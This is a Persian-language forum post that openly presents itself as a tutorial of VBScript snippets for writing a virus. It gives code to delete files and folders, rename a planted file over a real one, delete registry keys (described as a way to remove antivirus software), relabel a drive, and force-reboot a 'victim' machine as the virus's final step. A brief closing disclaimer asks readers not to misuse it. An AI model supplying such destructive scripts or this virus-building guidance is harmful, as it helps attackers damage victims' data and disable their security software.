Arash-Xp
داره كولاك ميكنه!
پست: 352
عضو شده در: 12 شهریور 1384
محل سکونت: اصفهان
امتياز: 3277
|
عنوان: كدهاي VBs براي نوشتن ويروس |
|
|
اينبار ميخواهم يکسري کد براي کار با برنامه نويسي VBS به شما معرفي کنم .البته توجه کنيد اين مقاله به منظور ساخت يک ويروس نوشته شده است .
حال بريم سراغ کد ها :
کدي که فايل A.TXT را به D:\Archive کپي ميکند و با قابليت جايگزيني :
كد:
Const OverwriteExisting = True
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.CopyFile "C:\A.txt" , "D:\Archive\", OverwriteExisting
کدي که فايل A.TXT را پاک ميکند :
كد:
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile("C:\A.txt")
به وسيله اين کد ميتوانيد مثلا فايلي با نام VIRUS.TXT را به A.TXT تغير نام دهيد :
كد:
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.MoveFile "C:\virus.txt" , "C:\A.txt"
کد مخربي که ميتواند فولدر مورد نظر ويروس نويس را پاک کند :
كد:
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFolder("C:\FSOcolor")
کدي براي ساخت فولدر :
كد:
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.CreateFolder("C:\Zerokool")
ساخت يک فايل مثلا TXT:
كد:
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("C:\virus.txt")
کدي بسيار حياتي براي برداشتن آنتي ويروس ها و يا هر کليد ديگري از رجيستري :
كد:
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\System Admin Scripting Guide"
oReg.DeleteKey HKEY_LOCAL_MACHINE, strKeyPath
اين کد اغلب در پايان ويروسها مي آيد و براي ريستارت کردن قرباني به کار ميرود :
كد:
strComputer = "atl-dc-01"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & _
strComputer & "\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
کدي براي تغيرر LABEL يک درايو :
كد:
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colDrives = objWMIService.ExecQuery _
("Select * from Win32_LogicalDisk where DeviceID = 'C:'")
For Each objDrive in colDrives
objDrive.VolumeName = "ZeroKool"
objDrive.Put_
Next
نکته :
اين کد ها فقط جهت آشنايي آورده شده اند و خواهش ميکنم از آنها استفاده سو نکنيد .
به علت راست چين شدن کد ها کافيست آنها را در يک NOTEPAD کپي کرده تا درست ديده شوند . |
|